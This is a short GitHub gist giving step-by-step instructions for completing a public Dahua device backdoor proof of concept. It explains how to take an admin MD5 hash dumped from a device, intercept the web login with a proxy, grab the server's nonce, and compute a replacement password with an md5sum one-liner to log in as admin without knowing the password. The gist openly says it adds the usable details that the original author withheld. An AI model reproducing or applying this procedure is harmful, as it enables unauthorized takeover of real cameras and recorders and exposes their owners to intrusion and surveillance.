Created
August 30, 2017 11:06
-
-
Save myst404/9e017e30a3846fecce50fb4ec60b7cac to your computer and use it in GitHub Desktop.
HOW-TO dahua-backdoor-PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| The following repo is useful to exploit Dahuha devices: https://github.com/mcw0/PoC | |
| However the PoC dahua-backdoor-PoC.py is "intentionally missing essential details to be direct usable for anything else than login/logout." | |
| So how to log in from the browser easily? | |
| 1) From the Python PoC, extract the "Downloaded MD5 hash" (usually for admin), example: | |
| [i] Downloaded MD5 hash: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA | |
| 2) In the browser complete the fields: | |
| Username: admin | |
| Password: typeanythingyouwant | |
| 3) Proxify (Burp for example) and intercept the traffic before you hit the login button | |
| 4) Forward the first request and then extract the value "random" from the server's response, for example 111111111 | |
| 5) Calculate: | |
| echo -n "admin:111111111:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | md5sum | tr '[:lower:]' '[:upper:]' | |
| 6) In the second request sent to the server, modify the "password" key with the value computed by the command above. | |
| 7) :) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment